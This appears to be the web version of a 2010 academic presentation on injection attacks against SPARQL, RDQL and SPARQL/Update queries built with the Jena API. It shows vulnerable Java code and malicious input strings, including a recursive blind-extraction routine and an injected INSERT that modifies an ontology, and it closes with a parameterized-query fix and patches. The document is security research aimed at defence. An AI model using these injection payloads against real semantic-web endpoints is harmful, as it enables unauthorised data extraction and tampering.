
Pablo Orduña (pablo.orduna[AT], Aitor Almeida (aitor.almeida[AT], Unai Aguilera (unai.aguilera[AT], Xabier Laiseca (xabier.laiseca[AT], Aitor Gómez-Goiri (aitor.gomez[AT]


  • Pablo Orduña, Aitor Almeida, Unai Aguilera, Xabier Laiseca, Diego López-de-Ipiña, Aitor Gómez-Goiri.Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages. Actas de las VI Jornadas Científico-Técnicas en Servicios Web y SOA (JSWEB 2010). p. p. 43 - 50. ISBN: 978-84-92812-59-2. Valencia, Spain. September 2010. Download


  • The Semantic Web is based on a set of technologies:
    • XML
    • RDF
    • OWL
    • ...
  • New technologies have been developed to query the ontologies
    • These new query languages are based on SQL
    • RDQL and SPARQL -> Read-only query languages
    • SPARUL (SPARQL/Update) -> modification capabilities
  • SPARQL Sample:

  PREFIX injection: <>
  SELECT ?p1 ?p2
      ?p1 a injection:Person . 
  • The use of these new query languages introduce vulnerabilities already found in a bad use of query languages
    • Attacks like SQL Injection, LDAP Injection or even XPath Injection are already well known
    • Libraries provide tools to sanitize user input in these languages
  • Anyway, main ontology query language libraries still don't provide any mechanism to avoid code injection
    • Without these mechanisms, we are facing new techniques, including:
      • (Blind) SPARQL Injection
      • (Blind) RDQL Injection
      • SPARUL Injection
  • In the following sections, we present simple proof of concepts of these techniques

SPARQL Injection

  • Introducing SPARQL Injection
    • The following query is assumed to retrieve the friends of a user whom fullName is provided by the variable name
    • It's written using the Jena API to create the SPARQL query

  String queryString = 
      "PREFIX injection: <> " +
      "SELECT ?name1 ?name2 " +
      "WHERE {" +
      "      ?p1 a injection:Person . " +
      "      ?p2 a injection:Person . " +
      "      ?p1 injection:fullName '" + name + "' . " +
      "      ?p1 injection:isFriendOf ?p2 . " +
      "      ?p1 injection:fullName ?name1 . " +
      "      ?p2 injection:fullName ?name2 . " +
  Query query = QueryFactory.create(queryString);
  • This code can be exploited to retrieve any information in the ontology
  • The problem is that the variable name has not been sanitized
    • This variable can include SPARQL code, and thus modify the query itself
    • A variable with malicious content can be found in the next slide

  Sample1code sample = new Sample1code();
  String name = "Pablo Orduna' . " +
      "?b1 a injection:Building . " +
      "?b1 injection:name ?name1 . " +
      "} #"; // }:-D		
  String result =;

So, the Strings we are appending are the following:

  String name = "Pablo Orduna' . " +
    "?b1 a injection:Building . " +
    "?b1 injection:name ?name1 . " +
    "} #";
  String queryString = 
    "PREFIX injection:  " +
    "SELECT ?name1 ?name2 WHERE {" +
    "  ?p1 a injection:Person . " +
    "  ?p2 a injection:Person . " +
    "  ?p1 injection:fullName '" + name + "' . " +
    "  ?p1 injection:isFriendOf ?p2 . " +
    "  ?p1 injection:fullName ?name1 . " +
    "  ?p2 injection:fullName ?name2 . " +

And the final query will be:

  String queryString = 
    "PREFIX injection:  " +
    "SELECT ?name1 ?name2 WHERE {" +
    "  ?p1 a injection:Person . " +
    "  ?p2 a injection:Person . " +
    "  ?p1 injection:fullName '" + "Pablo Orduna' . " +
    "    ?b1 a injection:Building . " +
    "    ?b1 injection:name ?name1 . " +
    "    } #" + "' . " +
    "  ?p1 injection:isFriendOf ?p2 . " +
    "  ?p1 injection:fullName ?name1 . " +
    "  ?p2 injection:fullName ?name2 . " +

So this code will be executed:

  PREFIX injection:  
  SELECT ?name1 ?name2 
	?p1 a injection:Person . 
	?p2 a injection:Person . 
	?p1 injection:fullName 'Pablo Orduna' . 
	?b1 a injection:Building . 
	?b1 injection:name ?name1 . 
  } # From this point everything is commented and thus ignored
		' .  
		?p1 injection:isFriendOf ?p2 . 
		?p1 injection:fullName ?name1 . 
		?p2 injection:fullName ?name2 . 
  • This code will return the name of the building instead of the name of a user
  • It is possible to use the power of SPARQL to perform other kind of queries retrieving any information in the ontology

Blind SPARQL Injection

  • Introducing Blind SPARQL Injection
    • The previous sample was especially vulnerable since it returned a string
      • It is possible to retrieve any information as a string
      • People usually don't retrieve strings in SPARQL, but individuals
    • What if the returning value is of an individual?
      • It's still possible to retrieve any information
      • If it's possible to know if a given query is true or false, it's possible to iteratively retrieve any information
    • The following code retrieves the individuals themselves
      • It's possible to know if the query provided or not the individuals

  String queryString = 
      "PREFIX xsd: <>" +
      "PREFIX injection: <> " +
      "SELECT ?p1 ?p2 " +
      "WHERE {" +
      "      ?p1 a injection:Person . " +
      "      ?p2 a injection:Person . " +
      "      ?p1 injection:fullName '" + name + "'^^xsd:string . " +
      "      ?p1 injection:isFriendOf ?p2 . " +
  Query query = QueryFactory.create(queryString);
  • Once again, the problem is that the variable name has not been sanitized
    • So it's still possible to inject SPARQL code
    • The injected code can't return a building or the building name
    • But, adding a condition like ``does the building name start by this letter'' we will get:
      • The common results -> so the building name starts by that letter
      • No results -> so the building name does not start by that letter
  • If the building name has 10 characters, in the worst case scenario we will need to test CHARSET_LENGTH * 10 times
    • For a building name, CHARSET_LENGTH could be a number around 64 (letters, capital letters and digits)
    • Note that this is different from CHARSET_LENGTH to the power of 10
      • 64 * 10 = 640 times
      • 64 ** 10 = 1152921504606846976 times
    • Even testing the whole Unicode charset is not a big deal

  public static boolean tryBlind(String s) throws Exception{
      Sample2code sample = new Sample2code();
      String name = "Pablo Orduna' . " +
        "?b1 a injection:Building . " +
        "?b1 injection:name ?buildingName . " +
        "FILTER  regex(?buildingName, \"^" + s + ".*\") . " +
        "} #"; // }:-D
      String result =;
      // result will be Pablo or null
      return result != null;

  public static String recursively(String letters) throws Exception{
      for(int i = 0; i < POSSIBLE_LETTERS.length(); ++i){
          // This part might be optimized with binsearch
          char c = POSSIBLE_LETTERS.charAt(i);
          if(tryBlind(letters + c)){
              return "" + c + recursively(letters + c);
      return "";

Concatenating the Strings, we will get the following query:

  "PREFIX xsd: <>" +
  "PREFIX injection: <> " +
  "SELECT ?p1 ?p2 WHERE {" +
  "  ?p1 a injection:Person . " +
  "  ?p2 a injection:Person . " +
  "  ?p1 injection:fullName 'Pablo Orduna' . " +
  " ?b1 a injection:Building . " +
  " ?b1 injection:name ?buildingName . " +
  " FILTER  regex(?buildingName, \"^" + s + ".*\") . " +
  " } #" + /* from here ignored*/ "'^^xsd:string . " +
  "      ?p1 injection:isFriendOf ?p2 . }";
  • It is possible to optimize this system using binary search
    • Performing queries using Regular Expressions like ^[A-M].* to know if the char is between the char A and M
    • Given a charset of length 64, we would reduce the number of iterations from 64 times 10 to 6 times 10
      • Using the whole Unicode charset, it would reduce the number of iterations from 65536 times 10 to 16 times 10!
  • The point is that it's possible to retrieve any information in the ontology independently from the values returned by the query

RDQL Injection

  • Introducing RDQL Injection
    • The following sample reproduces the first sample but this time using RDQL instead of SPARQL

  String queryString = 
      "SELECT ?name1 WHERE " +
      "      (?p1, <rdf:type>, <injection:Person>), " +
      "      (?p2, <rdf:type>, <injection:Person>), " +
      "      (?p1, <injection:fullName>, '" + name + "'), " +
      "      (?p1, <injection:isFriendOf>, ?p2), " +
      "      (?p1, <injection:fullName>, ?name1), " +
      "      (?p2, <injection:fullName>, ?name2) " +
      "USING injection for <>, " +
      "      rdf for <>\n";
  Query query = QueryFactory.create(queryString, Syntax.syntaxRDQL);
  String name = "Pablo Orduna'), " +
      "(?b1, <rdf:type>, <injection:Building>), " +
      "(?b1, <injection:name>, ?name1) " +
      "USING injection for <>, " +
      "      rdf for <>" +
      " # "; // }:-D
  String result =;

Blind RDQL Injection

  • Introducing Blind RDQL Injection
    • The following sample reproduces the second sample but this time using RDQL instead of SPARQL

  String queryString = 
      "SELECT ?p1 ?p2 " +
      "WHERE " +
      "      (?p1, <rdf:type>, <injection:Person>), " +
      "      (?p2, <rdf:type>, <injection:Person>), " +
      "      (?p1, <injection:fullName>, '" + name + "'), " +
      "      (?p1, <injection:isFriendOf>, ?p2) " +
      "USING xsd for <>," +
      "      injection for <>\n";
  Query query = QueryFactory.create(queryString, Syntax.syntaxRDQL);
  public static boolean tryBlind(String s) throws Exception{
      Sample4code sample = new Sample4code();
      String name = "Pablo Orduna'), " +
        "(?b1, <rdf:type>, <injection:Building>), " +
        "(?b1, <injection:name>, ?buildingName) " +
        "AND ?buildingName ~~ /^" + s + ".*/" +
        "USING injection for <>, " +
        "      rdf for <> //";
      String result =;
      return result != null;

  public static String recursively(String letters) throws Exception{
      for(int i = 0; i < POSSIBLE_LETTERS.length(); ++i){
         // This part might be optimized with binsearch:
         char c = POSSIBLE_LETTERS.charAt(i);
         if(tryBlind(letters + c)){
            return "" + c + recursively(letters + c);
      return "";

SPARQL/Update Injection

  • Introducing SPARQL/Update Injection
    • All the previous examples are executed in read-only query languages
    • SPARUL introduces the chance to modify the ontology
      • INSERT, MODIFY and DELETE statements are available
    • The following sample modifies the fullName of the resource injection:Pablo, setting it to the value of the variable name

  String updateString = "PREFIX injection: <> " +
      "PREFIX xsd: <> " +
      "DELETE {" +
      "	injection:Pablo injection:fullName ?name1 "+
      "} WHERE {" +
      "	injection:Pablo injection:fullName ?name1" +
      "}\n INSERT {" +
      "	injection:Pablo injection:fullName '" + name + "'^^xsd:string" +
  UpdateRequest update = UpdateFactory.create(updateString);
  • Once again, the variable name has not been sanitized
    • But this time it's possible to modify the ontology!

  String name = "Pablo Ordunya'^^xsd:string" +
      "} \n " +
      "INSERT {" +
      "    injection:Pablo injection:isFriendOf injection:EvilMonkey" +
      "} #"; // }:-D		
  String result =;
  • With this vulnerability, it is possible to modify the whole ontology!


  • In other query languages, the libraries provide tools to avoid code injection
  • For instance, the Java API provides:

  PreparedStatement ps = connection.prepareStatement("SELECT field FROM TABLE WHERE field = ?");
  ps.setString(1, variable);
  • There is no such mechanism provided by Pellet or Jena for this issue
    • Jena
      • Queries are created through the QueryFactory class
      • The possible inputs are Strings and URIs
    • Pellet
      • Queries are created through the QueryEngine class
      • The possible inputs are Strings
  • In order to easily avoid this problem, a new class that encapsulated the parsing of the parameters could be used
    • A String parameter should escape every dangerous characters (such as ')
    • Dangerous Unicode characters should be escaped too (\u0027, \u00000027)
    • Strong typing would be recommendable (xsd:int, xsd:short...)
  • This class should be used:
    • by the UpdateFactory and QueryFactory classes in Jena
    • by the QueryEngine class in Pellet
  • In the following slide we present a code sample using this parameterized string

  String queryString = 
      "PREFIX injection: <> " +
      "SELECT ?name1 ?name2 WHERE {" +
      "      ?p1 a injection:Person . " +
      "      ?p2 a injection:Person . " +
      "      ?p1 injection:fullName ${name} . " +
      "      ?p1 injection:isFriendOf ?p2 . " +
      "      ?p1 injection:fullName ?name1 . " +
      "      ?p2 injection:fullName ?name2 . " +
  ParameterizedString ps = new ParameterizedString(queryString);
  ps.setString("name", name);
  Query query = QueryFactory.create(ps);
  • In order to provide a solution, we have sent a patch for Pellet 1.5.1 and another Jena 2.5.5
    • Adding support for this ParameterizedString object in QueryEngine, QueryFactory and UpdateFactory
    • Under Open Source terms (MIT/X11 license: basically do whatever you want with this software, even relicense it under your preferred license)
    • With integrated JUnit unit tests
  • That's too much, can't I just scape the ' chars?
    • Not really; take into account the Unicode chars
    • The string \u0027 is a simple quote, just as in the Java Programming Language:

  // This code prints 2 :-)
  System.out.println("a\u0022.length() + \u0022b".length());

Taken from Java Puzzlers: Traps, Pitfalls, and Comer Cases. Joshua Bloch, Neal Gafter. Addisson Wesley Professional 2005

  • Using a class that encapsulates all the query language specific issues is far easier


  • Not sanitizing the user input might add a set of security vulnerabilities in our systems
  • Adding the user input directly to our SPARQL/RDQL queries
  • Once the ParameterizedString class is added to Jena/Pellet (or any other solution is taken by these libraries developers), it might help to fix these security flaws


The patchs for Jena ARQ 2.2 and Pellet 1.5.1 can be found in the following links:

This web site in slides format.

The samples are found here (in zip format).